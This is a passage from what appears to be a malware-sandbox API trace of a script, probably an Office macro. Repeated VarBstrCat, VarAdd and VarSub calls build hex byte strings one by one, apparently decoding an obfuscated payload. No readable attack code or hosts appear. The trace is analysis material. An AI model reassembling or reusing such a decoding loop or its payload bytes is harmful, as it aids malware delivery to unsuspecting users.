pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.733] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.734] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.734] VarBstrCat (in: bstrLeft="&H", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.734] VarBstrCat (in: bstrLeft="&H4", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.734] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.734] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.734] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.734] VarBstrCat (in: bstrLeft="&H", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.734] VarBstrCat (in: bstrLeft="&H4", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.734] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.734] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.735] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.735] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.735] VarBstrCat (in: bstrLeft="&Ha", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.735] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.735] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.735] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.735] VarBstrCat (in: bstrLeft="&H", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.735] VarBstrCat (in: bstrLeft="&H5", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.735] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.735] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.736] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.736] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.736] VarBstrCat (in: bstrLeft="&Ha", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.736] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.738] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.738] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.738] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.738] VarBstrCat (in: bstrLeft="&H7", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.738] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.738] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.738] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.738] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.738] VarBstrCat (in: bstrLeft="&Hc", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.738] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.739] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.739] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.739] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.739] VarBstrCat (in: bstrLeft="&Hb", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.739] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.739] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.739] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.739] VarBstrCat (in: bstrLeft="&H", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.739] VarBstrCat (in: bstrLeft="&H5", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.739] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.740] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.740] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.740] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.740] VarBstrCat (in: bstrLeft="&H3", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.740] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.740] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.740] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.740] VarBstrCat (in: bstrLeft="&H", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.740] VarBstrCat (in: bstrLeft="&H2", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.741] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.741] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.741] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.741] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.741] VarBstrCat (in: bstrLeft="&Hc", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.741] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.741] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.741] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.742] VarBstrCat (in: bstrLeft="&H", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.742] VarBstrCat (in: bstrLeft="&H1", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.742] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.742] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.742] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.742] VarBstrCat (in: bstrLeft="&H", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.742] VarBstrCat (in: bstrLeft="&H1", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.742] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.742] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.743] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.744] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.744] VarBstrCat (in: bstrLeft="&H7", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.744] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.744] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.745] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.745] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.745] VarBstrCat (in: bstrLeft="&Hb", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.745] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.745] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.745] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.745] VarBstrCat (in: bstrLeft="&H", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.745] VarBstrCat (in: bstrLeft="&H5", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.745] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.745] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.745] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.746] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.746] VarBstrCat (in: bstrLeft="&H3", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.746] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.746] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.746] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.746] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.746] VarBstrCat (in: bstrLeft="&H3", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.746] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.746] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.746] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.746] VarBstrCat (in: bstrLeft="&H", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.746] VarBstrCat (in: bstrLeft="&Hd", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.747] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.747] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.747] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.747] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.747] VarBstrCat (in: bstrLeft="&H7", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.747] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.747] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.747] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.747] VarBstrCat (in: bstrLeft="&H", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.747] VarBstrCat (in: bstrLeft="&H1", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.749] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.749] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.749] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.749] VarBstrCat (in: bstrLeft="&H", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.749] VarBstrCat (in: bstrLeft="&Hd", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.749] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.749] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.749] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.749] VarBstrCat (in: bstrLeft="&H", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.749] VarBstrCat (in: bstrLeft="&H0", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.750] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.750] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.750] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.750] VarBstrCat (in: bstrLeft="&H", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.750] VarBstrCat (in: bstrLeft="&H2", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.750] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.750] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.750] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.750] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.750] VarBstrCat (in: bstrLeft="&Hb", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.750] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.750] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.751] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.751] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.751] VarBstrCat (in: bstrLeft="&Hb", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.752] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.752] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.752] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.752] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.752] VarBstrCat (in: bstrLeft="&Hc", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.752] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.752] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.752] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.752] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.752] VarBstrCat (in: bstrLeft="&Hf", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.752] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.752] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.752] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.752] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.752] VarBstrCat (in: bstrLeft="&Hb", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.753] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.753] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.753] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.753] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.753] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.753] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.753] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.753] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.753] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.755] VarBstrCat (in: bstrLeft="&H6", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.755] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.755] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.755] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.755] VarBstrCat (in: bstrLeft="&H", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.755] VarBstrCat (in: bstrLeft="&H1", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.755] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.755] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.755] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.756] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.756] VarBstrCat (in: bstrLeft="&H7", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.756] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.756] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.756] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.756] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.756] VarBstrCat (in: bstrLeft="&Ha", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.756] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.756] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.756] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.756] VarBstrCat (in: bstrLeft="&H", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.756] VarBstrCat (in: bstrLeft="&H4", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.756] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.756] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.756] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.757] VarBstrCat (in: bstrLeft="&H", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.757] VarBstrCat (in: bstrLeft="&Hd", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.757] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.757] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.761] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.762] VarBstrCat (in: bstrLeft="&H", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.762] VarBstrCat (in: bstrLeft="&Hd", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.762] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.762] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.762] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.762] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.762] VarBstrCat (in: bstrLeft="&Hf", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.762] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.762] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.762] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.762] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.762] VarBstrCat (in: bstrLeft="&H7", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.762] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.762] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.763] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.763] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.763] VarBstrCat (in: bstrLeft="&Hc", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.763] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.763] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: 